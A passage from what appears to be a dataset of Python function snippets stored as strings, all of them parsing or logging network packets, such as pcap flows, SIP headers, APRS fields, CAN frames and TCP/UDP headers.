all_flows[f][i+1].timestamp))\n\n for f in tcp_flows:\n for i in range(len(tcp_flows[f])-1):\n tcp_flow_time.append(time_diff(tcp_flows[f][i].timestamp, tcp_flows[f][i+1].timestamp))\n\n for f in udp_flows:\n for i in range(len(udp_flows[f])-1):\n udp_flow_time.append(time_diff(udp_flows[f][i].timestamp, udp_flows[f][i+1].timestamp))\n\n # -- TCP State\n for f in tcp_flows:\n size = len(tcp_flows[f])\n last_pkt = tcp_flows[f][size-1]\n tcp = dpkt.ethernet.Ethernet(last_pkt.buf).data.data\n \n if (tcp.flags & dpkt.tcp.TH_SYN) != 0:\n f.state = 'Request'\n elif (tcp.flags & dpkt.tcp.TH_RST) != 0:\n f.state = 'Reset'\n elif (tcp.flags & dpkt.tcp.TH_FIN) != 0 and (tcp.flags & dpkt.tcp.TH_ACK) != 0:\n f.state = 'Finished'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) <= 300:\n f.state = 'Ongoing'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) > 300 \\\n and (tcp.flags & dpkt.tcp.TH_RST) == 0 and (tcp.flags & dpkt.tcp.TH_FIN) == 0:\n f.state = 'Failed'\n\n show_cdf_graphs()", "def packetReceived(self, packet):\n for layer in packet:\n if (layer.layer_name == 'fmtp' and\n int(layer.type) == 1):\n # Data is stored as a hexadecimal string in the XML file\n # generated by tshark\n data = binascii.unhexlify(layer.data)\n log.msg(\"FMTP message received: {}\".format(data))", "def pull(self):\n\n # For each packet in the pcap process the contents\n for item in self.input_stream:\n\n # Print out the timestamp in UTC\n print('%s -' % item['timestamp'], end='')\n\n # Transport info\n if item['transport']:\n print(item['transport']['type'], end='')\n\n # Print out the Packet info\n packet_type = item['packet']['type']\n print(packet_type, end='')\n packet = item['packet']\n if packet_type in ['IP', 'IP6']:\n # Is there domain info?\n if 'src_domain' in packet:\n print('%s(%s) --> %s(%s)' % (net_utils.inet_to_str(packet['src']), packet['src_domain'],\n net_utils.inet_to_str(packet['dst']), packet['dst_domain']), end='')\n else:\n print('%s --> %s' % (net_utils.inet_to_str(packet['src']), net_utils.inet_to_str(packet['dst'])), end='')\n else:\n print(str(packet))\n\n # Only include 
application if we have it\n if item['application']:\n print('Application: %s' % item['application']['type'], end='')\n print(str(item['application']), end='')\n\n # Just for newline\n print()", "def parse_pkt_list(self, pkt_list):\n flow_pkts = {}\n for (t, pkt) in pkt_list:\n flowID = self.extract_flowID(pkt)\n if flowID not in flow_pkts.keys():\n flow_pkts[flowID] = [(t, pkt)]\n else:\n flow_pkts[flowID].append((t,pkt))\n return flow_pkts", "def _parse_head(line):\n retval = {}\n m = re.match(\n '[0-9]+: (?P<if>\\w+\\d{1,3}): <(?P<flags>[^>]+)> mtu (?P<mtu>[0-9]+)',\n line\n )\n if m:\n retval['ifname'] = m.group('if')\n retval['mtu'] = int(m.group('mtu'))\n retval['flags'] = m.group('flags').split(',')\n return retval", "def _icmp_parse_payload(pkt):\n\n payload = ''\n icmp_pkt = pkt.get_protocol(icmp.icmp)\n for char in icmp_pkt.data.data:\n payload+=(chr(char))\n parsed_payload = ast.literal_eval(payload.rstrip('\\0'))\n return(parsed_payload)", "def fromstring(cls, str_pkt):\n xml_pkt = lxml.objectify.fromstring(str_pkt)\n layers = [Layer(proto) for proto in xml_pkt.proto]\n geninfo, frame, layers = layers[0], layers[1], layers[2:]\n frame.raw_mode = True\n return cls(layers=layers,\n length=int(geninfo.get_field_value('len')),\n captured_length=int(geninfo.get_field_value('caplen')),\n sniff_time=geninfo.get_field_value('timestamp', raw=True),\n interface_captured=frame.get_field_value('interface_id'))", "def read_packet(self):\n\n\t\t#self.debug(\"READ BUFFER SIZE: %d\" % len(self.buff))\n\t\tbackup = self.buff[:]\n\t\tpacket = Packet()\n\t\ttry:\n\t\t\tpacket.direction = self.node\n\t\t\tpacket.ident = self.unpack('ubyte')\n\t\t\t\n\t\t\t#Defined structs from huge dict\n\t\t\tfor datatype, name in self.get_struct(packet):\n\t\t\t\t# this populates packet.data with {name: value}\n\t\t\t\tpacket.data[name] = self.unpack(datatype)\n\n\t\t\t# I believe the following are packet-type specific fixes for variable-length packets.\n\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tpacket.data['x2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['y2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['z2'] = self.unpack('short')\n\t\t\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data'] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = self.unpack_array_fast('short', packet.data['data_size'])\n#\t\t\t\tbtype = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tmetadata = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tpacket.data[\"blocks\"] = []\n#\t\t\t\tfor i in zip(coords, btype, metadata):\n#\t\t\t\t\tblock = {}\n#\t\t\t\t\tblock[\"x\"] =\t\ti[0] >> 12\n#\t\t\t\t\tblock[\"z\"] = 0x0F & i[0] >> 8\n#\t\t\t\t\tblock[\"y\"] = 0xFF & i[0]\n#\t\t\t\t\tblock[\"type\"] = i[1]\n#\t\t\t\t\tblock[\"metadata\"] = i[2]\n#\t\t\t\t\tpacket.data[\"blocks\"].append(block)\n#\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\trecords = self.unpack_array_fast('byte', packet.data['data_size']*3)\n\t\t\t\ti = 0\n\t\t\t\tpacket.data[\"blocks\"] = []\n\t\t\t\twhile i < packet.data['data_size']*3:\n\t\t\t\t\tpacket.data[\"blocks\"].append(dict(zip(('x','y','z'), records[i:i+3])))\n\t\t\t\t\ti+=3\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data[\"slots_data\"] = 
self.unpack_array('slot', packet.data[\"data_size\"])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\t#0x82:\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tpacket.data[\"text\"] = []\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"text\"].append(packet.data[\"line_%s\" % (i+1)])\n\t\t\t\t\t\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data[\"data\"] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\n\t\t\t# Sets packet.original to the byte string that the packet was decoded from.\n\t\t\tpacket.original = backup[:len(backup) - len(self.buff)]\n\n\t\t\treturn packet\n\n\t\texcept IncompleteData:\n\t\t\tself.buff = backup\n\t\t\treturn None\n\t\texcept Exception, ex:\n\t\t\tself.buff = backup\n\t\t\tex.args += (self.buff[20:],)\n\t\t\traise", "def ReceiveMessageFromPacketInfo(self) -> IPPacketInformation:", "def parse_packet(self, data):\n return data.decode().split('\\x00')", "def process(self, packet):\n pass", "def tcp_pkt_debug_info(pkt: dpkt.ip.IP) -> str:\n if isinstance(pkt, dpkt.ip.IP):\n paylod_len = pkt.len - (4 * pkt.hl) - (4 * pkt.data.off)\n return \"{}:{}-> {}:{}, seq: {}, ack:{}, flag:{}, payload len: {}, payload: {}, sum: {}\".format(\n inet_to_str(pkt.src), pkt.data.sport, inet_to_str(pkt.dst), pkt.data.dport, hex(pkt.data.seq),\n hex(pkt.data.ack), hex(pkt.data.flags), hex(paylod_len), pkt.data.data, hex(pkt.data.sum))", "def _parse_data(data: str) -> Tuple[str, str, str, int, int, int, str]:\n\n phg = None\n rng = None\n dfs = None\n course = None\n speed = None\n altitude = None\n comment = None\n\n if re.match(r'^PHG[0-9]{4}', data[:7]):\n # Packet has a PHG (power, antenna height/gain/directivity) value\n phg = data[3:7]\n logger.debug(\"PHG is {}\".format(phg))\n data = data[7:]\n\n elif re.match('^RNG[0-9]{4}', data[:7]):\n # Packet has an RNG (radio range) value\n rng = data[3:7]\n logger.debug(\"RNG is {}\".format(rng))\n data = data[7:]\n\n elif re.match('^DFS[0-9]{4}', data[:7]):\n # Packet has a DFS (DF signal strength, antenna height/gain/directivity) value\n dfs = data[3:7]\n logger.debug(\"DFS is {}\".format(dfs))\n data = data[7:]\n\n elif re.match('^[0-9]{3}/[0-9]{3}', data[:7]):\n # Packet has course and speed values\n course = int(data[:3])\n speed = int(data[4:7])\n logger.debug(\"Course is {}, speed is {}\".format(course, speed))\n data = data[7:]\n\n # TODO - parse BRG/NRQ\n\n # Check for comment\n if len(data) > 0:\n\n # Check for altitude\n # As per APRS 1.01 C6 P26, altitude as /A=nnnnnn may appear anywhere in the comment\n has_altitude = re.match('.*/A=([0-9]{6}).*', data)\n if has_altitude:\n # TODO - fix altitude format\n altitude = int(has_altitude.groups()[0])\n logger.debug(\"Altitude is {} ft\".format(altitude))\n\n # Strip out the altitude from the comment\n data = re.sub(r'/A=[0-9]{6}', \"\", data)\n\n # Set the comment as the remainder of the information field\n comment = data\n logger.debug(\"Comment is {}\".format(comment))\n\n return (phg, rng, dfs, course, speed, altitude, comment)", "def parsePkt(pkt):\r\n meta = dict()\r\n headers = dict()\r\n for h,pattern in SIP_PKT_PATTERNS.iteritems():\r\n if h in ['reqfirstline', 'respfirstline']:\r\n continue\r\n headers[h] = None\r\n match = pattern.search(pkt)\r\n if match:\r\n headers[h] = re.sub(h + ': ', '', match.group()).rstrip('\\r\\n')\r\n if h == 'User-Agent' and headers[h]:\r\n headers[h] = re.sub(\"Server: \", \"\", headers[h])\r\n match_1 = SIP_PKT_PATTERNS['respfirstline'].search(pkt)\r\n match_2 = 
SIP_PKT_PATTERNS['reqfirstline'].search(pkt)\r\n if match_1:\r\n meta['respfirstline'] = match_1.group().rstrip(' \\r\\n')\r\n meta['code'] = int(match_1.group('code'))\r\n elif match_2:\r\n meta['reqfirstline'] = match_2.group().rstrip(' \\r\\n')\r\n meta['code'] = None\r\n else:\r\n print \"can't parse rotten SIP pkt:\\r\\n%s\" %(pkt)\r\n return \r\n if meta['code'] == AUTHREQ \\\r\n or meta['code'] == PROXYAUTHREQ:\r\n meta['auth-header'] = dict()\r\n auth_match = re.search('(?P<www_or_proxy>(?:WWW|Proxy)-Authenticate): Digest (?P<other_meta>.*)\\r\\n', pkt)\r\n if auth_match:\r\n meta['auth-header']['type'] = auth_match.group('www_or_proxy')\r\n if meta['auth-header']['type'] == 'WWW-Auth-Header':\r\n meta['auth-header']['domain'] = re.search('domain=\"([-\\/\\\\:\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n meta['auth-header']['qop'] = re.search('qop=\"([-\\/\\\\:\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n meta['auth-header']['stale'] = re.search('stale=(?:True|False)', other_meta).group(1)\r\n meta['auth-header']['opaque'] = re.search('opaque=\"([-\\/\\\\:\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n other_meta = auth_match.group('other_meta')\r\n algo_match = re.search('algorithm=([a-zA-Z0-9]+)', other_meta)\r\n meta['auth-header']['realm'] = re.search('realm=\"([-\\/\\\\:_\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n meta['auth-header']['nonce'] = re.search('nonce=\"([-\\/\\\\+:_\\.a-zA-Z0-9]+)\"', other_meta).group(1)\r\n if algo_match:\r\n meta['auth-header']['algorithm'] = algo_match.group(1)\r\n else:\r\n meta['auth-header']['algorithm'] = 'MD5' \r\n else:\r\n del meta['auth-header']\r\n meta['headers'] = headers\r\n return meta", "def callback(self, pkt):\n if ARP in pkt:\n self.parse_ip(pkt.sprintf(\"%ARP.psrc%\"))\n if TCP in pkt or UDP in pkt:\n self.parse_ip(pkt.sprintf(\"%IP.src%\"))\n self.parse_ip(pkt.sprintf(\"%IP.dst%\"))", "def parse_pkt_list(self, log_pkt_list):\n flow_pkts = {}\n for pkt in log_pkt_list:\n flowID = pkt.flowID\n if flowID not in flow_pkts.keys():\n flow_pkts[flowID] = [(pkt.time, pkt)]\n else:\n flow_pkts[flowID].append((pkt.time, pkt))\n return flow_pkts", "def read_raw_packet(self):\n\n size = 0\n\n # Read our two-byte header from the debugger...\n while not size:\n size = (self._get_next_byte() << 16) | self._get_next_byte()\n\n # ... 
and read our packet.\n packet = bytearray([self._get_next_byte() for _ in range(size)])\n\n # Return our packet.\n # TODO: extract and provide status flags\n # TODO: generate a timestamp on-device\n return packet, datetime.now(), None", "def unpack(self, pkt):\n if pkt[0]!='$' or pkt[-3]!='#':\n raise ValueError('bad packet')\n if (sum(ord(c) for c in pkt[1:-3]) % 256) != int(pkt[-2:],16):\n raise ValueError('bad checksum')\n pkt = pkt[1:-3]\n return pkt", "def interpret_packet_value_pair(data):\n if data is None:\n return None, None\n packet_type = int.from_bytes(data[3:4], 'little')\n name = value = None\n if packet_type == 1:\n name = str(data[17:], 'utf8') \n value = float(ustruct.unpack('<i', data[12:16])[0])\n elif packet_type == 5:\n name = str(data[21:29], 'ascii').strip()\n value = ustruct.unpack('<d', data[12:20])[0]\n else:\n display.scroll('Packet type {} not recognised'.format(packet_type))\n return name, value", "def extract_trpt_data(udp_packet):\n logger.debug('UDP packet sport [%s], dport [%s], len [%s]',\n udp_packet.sport, udp_packet.dport, udp_packet.len)\n\n trpt_pkt = TelemetryReport(_pkt=udp_packet.payload)\n trpt_eth = EthInt(trpt_pkt.payload)\n logger.debug('TRPT ethernet dst - [%s], src - [%s], type - [%s]',\n trpt_eth.dst, trpt_eth.src, trpt_eth.type)\n return extract_int_data(trpt_eth)", "def ethernet_frame(packet):\n dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', packet[:14])\n return get_mac_addr(dest_mac), get_mac_addr(src_mac), socket.htons(proto), packet[14:]", "def parse(self):\n i = 1\n times = []\n while 1:\n byte = yield\n if byte== 0xaa:\n byte = yield # This byte should be \"\\aa\" too\n if byte== 0xaa:\n # packet synced by 0xaa 0xaa\n packet_length = yield\n packet_code = yield\n if packet_code == 0xd4:\n # standing by\n self.state = \"standby\"\n elif packet_code == 0xd0:\n self.state = \"connected\"\n elif packet_code == 0xd2:\n data_len = yield\n headset_id = yield\n headset_id += yield\n self.dongle_state = \"disconnected\"\n else:\n self.sending_data = True\n left = packet_length - 2\n while left>0:\n if packet_code ==0x80: # raw value\n row_length = yield\n a = yield\n b = yield\n value = struct.unpack(\"<h\",chr(b)+chr(a))[0]\n self.dispatch_data(\"raw\", value)\n left -= 2\n elif packet_code == 0x02: # Poor signal\n a = yield\n\n left -= 1\n elif packet_code == 0x04: # Attention (eSense)\n a = yield\n if a>0:\n v = struct.unpack(\"b\",chr(a))[0]\n if 0 < v <= 100:\n self.dispatch_data(\"attention\", v)\n left-=1\n elif packet_code == 0x05: # Meditation (eSense)\n a = yield\n if a>0:\n v = struct.unpack(\"b\",chr(a))[0]\n if 0 < v <= 100:\n self.dispatch_data(\"meditation\", v)\n left-=1\n elif packet_code == 0x16: # Blink Strength\n self.current_blink_strength = yield\n \n left-=1\n elif packet_code == 0x83:\n vlength = yield\n self.current_vector = []\n for row in range(8):\n a = yield\n b = yield\n c = yield\n value = a*255*255+b*255+c\n left -= vlength\n self.dispatch_data(\"bands\", self.current_vector)\n packet_code = yield\n else:\n pass # sync failed\n else:\n pass # sync failed", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = 
socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. 
Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def setPacket(self, packet):\n\t\tself.clear()\n\t\tself.packet = packet\n\t\t\n\t\tfields = self.fields\n\t\t\n\t\tfields.append(['Reception time', '%s:%s:%s.%s' % tuple(packet.time), None])\n\t\t\n\t\tif self.packet.isInvalid:\n\t\t\treturn\n\t\t\n\t\tfields.append(['Transmission info', 'CRC passed: %s, LQI: %s, RSSI: %s' % (packet.CRCOk, packet.LQI, packet.RSSI), None])\n\t\tfields.append(['PHY fields', '', None])\n\t\tphy = len(fields) - 1\n\t\tfields.append(['Frame length', len(packet.load), phy])\n\t\t\n\t\tfields.append(['MAC fields', '', None])\n\t\tmac = len(fields) - 1\n\t\tfields.append(['Frame control', packet.frameControl, mac])\n\t\tfields.append(['Frame Type', packet.frameType, mac])\n\t\tfields.append(['Security enabled', packet.securityEnabled, mac])\n\t\tfields.append(['Frame pending', packet.framePending, mac])\n\t\tfields.append(['Ack. request', packet.ackRequest, mac])\n\t\tfields.append(['Intra-PAN', packet.intraPAN, mac])\n\t\tfields.append(['Dest. 
addressing mode', packet.dstAddrMode, mac])\n\t\tfields.append(['Source addressing mode', packet.srcAddrMode, mac])\n\t\tfields.append(['Sequence number', packet.seqNumber, mac])\n\t\t\n\t\tif hasattr(packet, 'dstPANID'):\n\t\t\tfields.append(['Destination PAN-ID', packet.dstPANID, mac])\n\t\t\n\t\tif hasattr(packet, 'dstAddr'):\n\t\t\tfields.append(['Destination address', packet.dstAddr, mac])\n\t\t\n\t\tif hasattr(packet, 'srcPANID'):\n\t\t\tfields.append(['Source PAN-ID', packet.srcPANID, mac])\n\t\t\t\n\t\tif hasattr(packet, 'srcAddr'):\n\t\t\tfields.append(['Source address', packet.srcAddr, mac])\n\t\t\t\n\t\tif hasattr(packet, 'payload'):\n\t\t\tfields.append(['Payload', packet.payload, mac])\n\t\t\n\t\tif hasattr(packet, 'commandType'):\n\t\t\tfields.append(['Command type', packet.commandType, mac])\n\t\t\n\t\tif hasattr(packet, 'commandPayload'):\n\t\t\tfields.append(['Command payload', packet.commandPayload, mac])\n\t\t\n\t\tif hasattr(packet, 'superFrameSpec'):\n\t\t\tfields.append(['Superframe specification', packet.superFrameSpec, mac])\n\t\t\tsfs = len(fields) - 1\n\t\t\tfields.append(['Beacon order', packet.beaconOrder, sfs])\n\t\t\tfields.append(['Superframe order', packet.superFrameOrder, sfs])\n\t\t\tfields.append(['finalCAPSlot', packet.finalCAPSlot, sfs])\n\t\t\tfields.append(['Batt. life extension', packet.battLifeExt, sfs])\n\t\t\tfields.append(['PAN Coordinator', packet.PANCoord, sfs])\n\t\t\tfields.append(['Association permit', packet.assocPermit, sfs])\n\t\t\n\t\tif hasattr(packet, 'GTS'):\n\t\t\tfields.append(['GTS specification', packet.GTS, mac])\n\t\t\tgts = len(fields) - 1\n\t\t\tfields.append(['GTS descriptor count', packet.GTSDescrCount, gts])\n\t\t\tfields.append(['GTS permit', packet.GTSPermit, gts])\n\t\t\tif int(packet.GTSDescrCount, 16) > 0:\n\t\t\t\tfields.append(['GTS directions', packet.GTSDirections, gts])\n\t\t\t\tfields.append(['GTS descriptors list', '', gts])\n\t\t\t\tdscList = len(fields) - 1\n\t\t\t\tfor i in xrange(int(packet.GTSDescrCount, 16)):\n\t\t\t\t\tfields.append(['Descriptor #'+str(i), '', dscList])\n\t\t\t\t\td = len(fields) - 1\n\t\t\t\t\tfields.append(['Device short address', packet.GTSDescriptors[i].deviceShortAddr, d])\n\t\t\t\t\tfields.append(['GTS starting slot', packet.GTSDescriptors[i].GTSStartingSlot, d])\n\t\t\t\t\tfields.append(['GTS length', packet.GTSDescriptors[i].GTSLength, d])\n\t\t\t\n\t\t\tfields.append(['Pending addresses list', '', gts])\n\t\t\tpnd = len(fields) - 1\n\t\t\tif int(packet.numShortAddrPnd, 16) > 0 or int(packet.numShortAddrPnd, 16) > 0:\n\t\t\t\tfor i in xrange(int(self.numShortAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Short addr. #%i' % i, packet.shortAddrPndList[i], pnd])\n\n\t\t\t\tfor i in xrange(int(self.numLongAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Long addr. #%i' % i, packet.longAddrPndList[i], pnd])\n\t\t\n\t\tif hasattr(packet, 'bcnPayload'):\n\t\t\tfields.append(['Beacon payload', packet.bcnPayload, mac])\n\t\t\n\t\tself.beginInsertRows(QModelIndex(), 0, len(self.fields)+1)\n\t\tself.endInsertRows()\n\t\tfor field in fields:\n\t\t\tprint field", "def parse(data: bytes, port: int, origin: helpers.ConnectionType):\n # Ignore packets from master server... 
game server is more interesting\n if port == helpers.MASTER_PORT:\n return\n # Iteratively parse packet data until nothing is left to parse\n reads = 0\n while len(data) >= 2:\n reads += 1\n pid = data[:2]\n handler = PACKET_HANDLERS.get(pid, None)\n if handler:\n # Parse data without packet id prepended\n # Returned data will be parsed next iteration\n data = handler(data[2:], origin=origin)\n else:\n # This packet doesn't have a handler\n # Print it once for inspection\n if reads <= 1:\n print(f'[{pid}] - {data}\\n')\n # Remove the first byte and try parsing again later\n data = data[1:]", "def get_payload(packet):\n #payload_len = get_payload_length(packet)\n adaptation_field_len = TS.get_adaptation_field_length(packet)\n header_size = 4 + adaptation_field_len\n return packet[header_size:]", "def __getHeaderInfo(self, decoded_data):\n\t\tip = decoded_data.child()\n\t\ttcp = ip.child()\n\t\t#src = (ip.get_ip_src(), tcp.get_th_sport())\n\t\ttry:\tsrc = ip.get_ip_src()\n\t\texcept:\tsrc = '?'\n\t\t#dst = (ip.get_ip_dst(), tcp.get_th_dport())\n\t\ttry:\tdst = ip.get_ip_dst()\n\t\texcept:\tdst = '?'\n\t\t#data = tcp.get_data_as_string()\n\t\tdata = tcp.get_packet()\n\t\treturn (src, dst, data)", "def handle_pkt_header(pkt, packets, index):\r\n dest_mac = pkt[0:12]\r\n str_dest_mac = dest_mac[0:2]\r\n for i in range(2, len(dest_mac), 2):\r\n str_dest_mac += \":\" + dest_mac[i:i+2]\r\n packets[index][0].append(str_dest_mac)\r\n src_mac = pkt[12:24]\r\n str_src_mac = pkt[0:2]\r\n for i in range(2, len(src_mac), 2):\r\n str_src_mac += \":\" + src_mac[i:i+2]\r\n packets[index][0].append(str_src_mac)\r\n etherType = pkt[24:28]\r\n packets[index][0].append(etherType)\r\n\r\n return packets", "def packet_from_xml_packet(xml_pkt, psml_structure=None):\n if not isinstance(xml_pkt, lxml.objectify.ObjectifiedElement):\n parser = lxml.objectify.makeparser(huge_tree=True, recover=True)\n try:\n xml_pkt = lxml.objectify.fromstring(xml_pkt, parser)\n except lxml.etree.XMLSyntaxError:\n res = re.findall(r'<field name=\"num\" pos=\"0\" show=\"(.*?)\"', xml_pkt.decode(), re.S)[0]\n print(f'Packet conversion error from xml to python object for packet number {res}.')\n return\n if psml_structure:\n return _packet_from_psml_packet(xml_pkt, psml_structure)\n return _packet_object_from_xml(xml_pkt)", "def decode(self, msg):\n if len(msg) < 2:\n raise ValueError(\"Message is too short - can't fit a preamble\")\n preamble = msg[:2]\n \n (x,) = struct.unpack(\"<H\", preamble)\n \n ID = (x & self.ID_MASK) >> 4\n LEN = x & self.LEN_MASK\n\n if LEN < 0 or LEN > 8:\n raise ValueError(\"Invalid CAN payload length - %d bytes not in [0,8] bytes\" % LEN)\n\n if LEN != len(msg[2:]):\n raise ValueError(\"Length from preamble %d mismatches actual length %d in packet w/id %#x\" %\n (LEN, len(msg[2:]), ID))\n\n TIME = datetime.datetime.utcnow()\n \n if ID in self.descriptors:\n desc = self.descriptors[ID]\n if \"format\" not in desc:\n raise ValueError(\"No format specified for %#x:%s\" % (ID, desc[\"name\"]))\n if LEN != struct.calcsize(\"<\" + str(desc[\"format\"])):\n raise ValueError(\"Error in decoding message id=%#x name=%s - length field %d mismatches descriptor %d\"\n % (ID, desc[\"name\"], LEN, struct.calcsize(\"<\" + str(desc[\"format\"]))))\n\n DATA = struct.unpack(\"<\" + str(desc[\"format\"]), msg[2:2+LEN])\n \n return (TIME, ID, desc, DATA)\n else:\n raise ValueError(\"Unknown message id=%#x, len=%d, data=%r\" % (ID, LEN, msg[2:]))", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = 
int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def __init__(self, pcap):\n self.pcap = pcap\n self.actions = []\n self._parse_pcap()", "def handle_tcp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n sequence_num = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n acknowledgment = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n data_offset = int(pkt[start_point], 16) * 4\r\n start_point += 2\r\n flags = pkt[start_point:start_point+2]\r\n flags_str = \"\"\r\n for f in flags:\r\n flags_str += str(format(int(f), '04b'))\r\n start_point += 2\r\n window_size = 